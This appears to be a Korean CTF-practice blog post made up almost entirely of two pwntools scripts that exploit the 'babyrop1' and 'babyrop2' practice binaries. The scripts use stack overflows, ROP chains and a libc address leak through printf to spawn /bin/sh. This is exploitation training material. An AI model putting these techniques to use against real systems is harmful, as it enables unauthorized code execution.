bayrop1_exploit.py
from pwn import *
p = process("./babyrop1")
system = 0x400490
binsh = 0x601048
pr = 0x400683
ret = 0x400479
payload = "A"*(0x10+8)
payload += p64(pr)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)
p.sendlineafter("? ",payload)
p.interactive()
babyrop2_exploit.py
from pwn import *
p = process("./babyrop2")
e = ELF("./babyrop2")
l = e.libc
pr = 0x400733
ret = 0x4004d1
one_gadget = [0x4f2c5,0x4f322,0x10a38c]
payload = "A"*(0x20+8)
payload += p64(pr)
payload += p64(e.got["read"])
payload += p64(ret)
payload += p64(e.plt['printf'])
payload += p64(ret)
payload += p64(0x400636)
p.sendlineafter("? ",payload)
p.recvuntil("!\n")
read_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']
binsh = libc_base + list(l.search("/bin/sh"))[0]
payload2 = "A"*(0x20+8)
payload2 += p64(ret)
payload2 += p64(pr)
payload2 += p64(binsh)
payload2 += p64(system_addr)
p.recvuntil("? ")
p.sendline(payload2)
p.interactive()
'System > Pwnable Practice' 카테고리의 다른 글
| Layer7 CTF 2018 Talmoru_party!~ (0) | 2019.08.02 |
|---|---|
| Defcon CTF 2019 Speedrun 1,2 (0) | 2019.08.01 |
| Hitcon CTF 2017 start (0) | 2019.07.30 |
| Codegate 2019 CTF aeiou (0) | 2019.07.30 |
| Codegate 2016 CTF Watermelon (0) | 2019.07.29 |
JeonYoungSin
메모 기록용 공간